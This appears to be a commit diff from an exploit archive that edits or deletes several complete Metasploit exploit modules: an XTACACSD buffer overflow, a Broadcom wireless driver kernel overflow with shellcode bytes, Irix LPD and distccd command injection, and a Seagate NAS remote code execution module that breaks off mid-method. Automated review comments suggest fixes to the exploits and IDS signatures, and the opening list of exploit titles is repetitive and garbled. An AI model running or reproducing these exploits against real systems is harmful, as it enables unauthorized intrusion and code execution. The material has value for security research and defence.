Component huruhelpdesk - SQL Injection Joomla! Component Huru Helpdesk - SQL Injection (1) PGAUTOPro - SQL Injection / Cross-Site Scripting PGAUTOPro - SQL Injection / Cross-Site Scripting (1) Joomla! Component Huru Helpdesk - SQL Injection Joomla! Component Huru Helpdesk - SQL Injection (2) SoftwareDEP Classified Script 2.5 - SQL Injection SoftwareDEP Classified Script 2.5 - SQL Injection (1) WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities Software DEP Classified Script 2.5 - SQL Injection SoftwareDEP Classified Script 2.5 - SQL Injection (2) Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1) Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2) Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1) Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2) OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion ActiveNews Manager - 'articleId' Parameter SQL Injection ActiveNews Manager - 'articleId' Parameter SQL Injection (1) Active News Manager - 'articleId' Parameter SQL Injection ActiveNews Manager - 'articleId' Parameter SQL Injection (2) Sagem Fast 3304-V2 - Authentication Bypass Sagem Fast 3304-V2 - Authentication Bypass (1) PG Auto Pro - SQL Injection / Cross-Site Scripting PGAUTOPro - SQL Injection / Cross-Site Scripting (2) Sagem FAST3304-V2 - Authentication Bypass Sagem FAST3304-V2 - Authentication Bypass (2) Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues phpATM 1.32 - Arbitrary File Upload 
/ Remote Command Execution (Windows Servers) phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
parent 52fd3d8a20
commit 0320cba051
50 changed files with 1005 additions and 3974 deletions
|
@ -1,9 +1,9 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
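Review bot: the header change in this hunk goes the wrong way: `# $Id$` is replaced by the expanded `# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $`, a stale Subversion keyword expansion that the later `@ -1,90 +0,0 @@` hunk shows was carried by the duplicate copy being deleted. If the intent is to keep a single copy of this module, keep the unexpanded `$Id$` (or drop the keyword line altogether) rather than freezing a 2010 revision stamp into the surviving file; the `'Version'` field in the later hunk has the same problem.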
@ -11,8 +11,8 @@
|
|||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Exploit::Brute
|
||||
|
@ -21,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-7232'],
|
||||
['OSVDB', '58140'],
|
||||
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
|
||||
|
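Review bot: `'Version' => '$Revision$'` becomes `'Version' => '$Revision: 9262 $'` here, a hard-coded Subversion keyword expansion that will never update again; prefer the unexpanded `$Revision$` or remove the field. The description wording change from "stack overflow" to "stack buffer overflow" is an improvement, and the references (`['CVE', '2008-7232']`, `['OSVDB', '58140']`, the aluigi advisory URL) are unchanged, so nothing else in this hunk needs attention.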
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
['FreeBSD 6.2-Release Bruteforce',
|
||||
|
@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 8 2008'))
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
|
@ -80,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << "\x00\x00\x00\x00" # Result 2
|
||||
sploit << "\x00\x00" # Result 3
|
||||
sploit << make_nops(238 - payload.encoded.length)
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
disconnect_udp
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,90 +0,0 @@
|
|||
##
|
||||
# $Id: xtacacsd_report.rb 9262 2010-05-09 17:45:00Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Exploit::Brute
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
|
||||
sending a specially crafted XTACACS packet with an overly long
|
||||
username, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => 'MC',
|
||||
'Version' => '$Revision: 9262 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-7232'],
|
||||
['OSVDB', '58140'],
|
||||
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 175,
|
||||
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
|
||||
'StackAdjustment' => -3500,
|
||||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
['FreeBSD 6.2-Release Bruteforce',
|
||||
{'Bruteforce' =>
|
||||
{
|
||||
'Start' => { 'Ret' => 0xbfbfea00 },
|
||||
'Stop' => { 'Ret' => 0xbfbfef00 },
|
||||
'Step' => 24,
|
||||
}
|
||||
},
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 8 2008'))
|
||||
|
||||
register_options([Opt::RPORT(49)], self.class)
|
||||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
connect_udp
|
||||
|
||||
sploit = "\x80" # Version
|
||||
sploit << "\x05" # Type: Connect
|
||||
sploit << "\xff\xff" # Nonce
|
||||
sploit << "\xff" # Username length
|
||||
sploit << "\x00" # Password length
|
||||
sploit << "\x00" # Response
|
||||
sploit << "\x00" # Reason
|
||||
sploit << "\xff\xff\xff\xff" # Result 1
|
||||
sploit << "\xff\xff\xff\xff" # Destination address
|
||||
sploit << "\xff\xff" # Destination port
|
||||
sploit << "\xff\xff" # Line
|
||||
sploit << "\x00\x00\x00\x00" # Result 2
|
||||
sploit << "\x00\x00" # Result 3
|
||||
sploit << make_nops(238 - payload.encoded.length)
|
||||
sploit << payload.encoded + [address['Ret']].pack('V')
|
||||
|
||||
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")
|
||||
udp_sock.put(sploit)
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
|
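Review bot: this deleted file is line-for-line the same module as the one modified in the hunks above (same `$Id: xtacacsd_report.rb 9262` header, same `'Name'`, same `register_options([Opt::RPORT(49)], self.class)`), so the commit is a de-duplication; the commit message should name the surviving path so that references to the removed copy can be updated. For anyone writing detection for the retained module, the packet built in `brute_exploit` is fixed apart from the payload: version `0x80`, type `0x05` (Connect), a username-length byte of `0xff`, then a 238-byte NOP/payload body and a 4-byte return address, all on UDP/49. That is a tight signature for an IDS rule on the TACACS port and would be worth stating in the module description, which currently says only "overly long username".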
@ -1,206 +0,0 @@
|
|||
##
|
||||
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the Broadcom Wireless driver
|
||||
that allows remote code execution in kernel mode by sending a 802.11 probe
|
||||
response that contains a long SSID. The target MAC address must
|
||||
be provided to use this exploit. The two cards tested fell into the
|
||||
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Eagle', # initial discovery
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
|
||||
'skape', # windows kernel ninjitsu and debugging
|
||||
'hdm' # porting the C version to ruby
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-5882'],
|
||||
['OSVDB', '30294'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
'Recovery' => 'idlethread_restart',
|
||||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 11 2006'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
stime = Time.now.to_i
|
||||
|
||||
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
select(nil, nil, nil, 0.02)
|
||||
wifi.write(create_response)
|
||||
|
||||
select(nil, nil, nil, 0.01)
|
||||
wifi.write(create_beacon)
|
||||
|
||||
break if session_created?
|
||||
|
||||
end
|
||||
|
||||
print_status("Finished sending frames...")
|
||||
end
|
||||
|
||||
def create_beacon
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton('FF:FF:FF:FF:FF:FF')
|
||||
seq = [Time.now.to_i % 4096].pack('n')
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x80.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src
|
||||
blob[22,2] = seq
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_response
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton(datastore['ADDR_DST'])
|
||||
seq = [Time.now.to_i % 256].pack('n')
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[22,2] = seq
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_frame
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
||||
#
|
||||
# fixed parameters
|
||||
#
|
||||
|
||||
# timestamp value
|
||||
rand_text_alphanumeric(8) +
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x11\x04" + # capability flags
|
||||
|
||||
#
|
||||
# tagged parameters
|
||||
#
|
||||
|
||||
# ssid tag
|
||||
"\x00" + # tag: SSID parameter set
|
||||
"\x5d" + # len: length is 93 bytes
|
||||
|
||||
# jump into the payload
|
||||
"\x89\xf9" + # mov edi, ecx
|
||||
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
|
||||
"\xff\xe1" + # jmp ecx
|
||||
|
||||
# padding
|
||||
rand_text_alphanumeric(79) +
|
||||
|
||||
# return address
|
||||
[target.ret].pack('V') +
|
||||
|
||||
# vendor specific tag
|
||||
"\xdd" + # wpa
|
||||
"\xff" + # big as we can make it
|
||||
|
||||
# the kernel-mode stager
|
||||
payload.encoded
|
||||
end
|
||||
|
||||
end
|
|
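Review bot: two issues in the deleted broadcom_wifi_ssid.rb are worth carrying over if the module is restored under another path. `ADDR_DST` is declared required but defaults to `FF:FF:FF:FF:FF:FF`, while the description says the target MAC "must be provided"; a required option with a broadcast default means a run in which the user forgets to set it addresses every station in range, so the default should be dropped. And `create_beacon` computes the sequence field as `Time.now.to_i % 4096` while `create_response` uses `% 256`; the 802.11 sequence number is a 12-bit field, so `% 4096` is the consistent choice for both.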
@ -1,32 +1,31 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Irix LPD tagprinter Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
},
|
||||
'Author' => [ 'optyx', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 10561 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
|
@ -45,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 01 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -64,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock.put("T;uname -a;\n")
|
||||
resp = sock.get_once
|
||||
disconnect
|
||||
|
||||
|
||||
if (resp =~ /IRIX/)
|
||||
print_status("Response: #{resp.strip}")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.put("T;#{payload.encoded};\n")
|
||||
|
|
|
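Review bot: `check` here is not a passive probe. It sends `T;uname -a;\n` to the LPD port, which is the same command-injection path that `exploit` uses with `T;#{payload.encoded};\n`, so calling `check` already executes a command on the target. That should be documented in the module, or the check downgraded to a banner or response-shape test, so that scanners that invoke `check` across a network understand they are triggering the vulnerability rather than fingerprinting it.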
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Irix LPD tagprinter Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
the in.lpd service shipped with all versions of Irix.
|
||||
},
|
||||
'Author' => [ 'optyx', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10561 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2001-0800'],
|
||||
['OSVDB', '8573'],
|
||||
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['unix', 'irix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 01 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put("T;uname -a;\n")
|
||||
resp = sock.get_once
|
||||
disconnect
|
||||
|
||||
if (resp =~ /IRIX/)
|
||||
print_status("Response: #{resp.strip}")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.put("T;#{payload.encoded};\n")
|
||||
handler
|
||||
print_status("Payload: #{payload.encoded}")
|
||||
end
|
||||
|
||||
end
|
|
@ -1,132 +0,0 @@
|
|||
##
|
||||
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'DistCC Daemon Command Execution',
|
||||
'Description' => %q{
|
||||
This module uses a documented security weakness to execute
|
||||
arbitrary commands on any system running distccd.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-2687'],
|
||||
[ 'OSVDB', '13378' ],
|
||||
[ 'URL', 'http://distcc.samba.org/security.html'],
|
||||
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl ruby bash telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 01 2002'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3632)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||
sock.put(distcmd)
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
if !(res and res.length == 24)
|
||||
print_status("The remote distccd did not reply to our request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
# Check STDERR
|
||||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stderr: #{line}")
|
||||
end
|
||||
end
|
||||
|
||||
# Check STDOUT
|
||||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
# Generate a distccd command
|
||||
def dist_cmd(*args)
|
||||
|
||||
# Convince distccd that this is a compile
|
||||
args.concat(%w{# -c main.c -o main.o})
|
||||
|
||||
# Set distcc 'magic fairy dust' and argument count
|
||||
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
|
||||
|
||||
# Set the command arguments
|
||||
args.each do |arg|
|
||||
res << sprintf("ARGV%.8x%s", arg.length, arg)
|
||||
end
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
end
|
||||
|
|
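Review bot: in the deleted distcc_exec.rb, both the `# Check STDERR` and `# Check STDOUT` blocks do `res = sock.get_once(8, 5)` and then `len = [res].pack("H*").unpack("N")[0]` before the `return if not len` guard; if that read times out, `res` is `nil` and `[nil].pack("H*")` raises `TypeError`, so the nil check belongs on `res` before the pack. The earlier `if !(res and res.length == 24)` block shows the intended pattern and should be reused here.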
@ -1,353 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rexml/document'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
Some Seagate Business NAS devices are vulnerable to command execution via a local
|
||||
file include vulnerability hidden in the language parameter of the CodeIgniter
|
||||
session cookie. The vulnerability manifests in the way the language files are
|
||||
included in the code on the login page, and hence is open to attack from users
|
||||
without the need for authentication. The cookie can be easily decrypted using a
|
||||
known static encryption key and re-encrypted once the PHP object string has been
|
||||
modified.
|
||||
This module has been tested on the STBN300 device.
|
||||
},
|
||||
'Author' => [
|
||||
'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-8684'],
|
||||
['CVE', '2014-8686'],
|
||||
['CVE', '2014-8687'],
|
||||
['EDB', '36202'],
|
||||
['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'],
|
||||
['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 01 2015',
|
||||
'Privileged' => true,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' => {'DisableNops' => true},
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DefaultTarget' => 0,
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
|
||||
OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']),
|
||||
OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']),
|
||||
OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07'])
|
||||
])
|
||||
end
|
||||
|
||||
#
|
||||
# Write a string value to a serialized PHP object without deserializing it first.
|
||||
# If the value exists it will be updated.
|
||||
#
|
||||
def set_string(php_object, name, value)
|
||||
prefix = "s:#{name.length}:\"#{name}\";s:"
|
||||
if php_object.include?(prefix)
|
||||
# the value already exists in the php blob, so update it.
|
||||
return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"")
|
||||
end
|
||||
|
||||
# the value doesn't exist in the php blob, so create it.
|
||||
count = php_object.split(':')[1].to_i + 1
|
||||
php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}")
|
||||
end
|
||||
|
||||
#
|
||||
# Findez ze holez!
|
||||
#
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => 'text/html'
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
headers = res.to_s
|
||||
|
||||
# validate headers
|
||||
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
# and make sure that the body contains the title we'd expect
|
||||
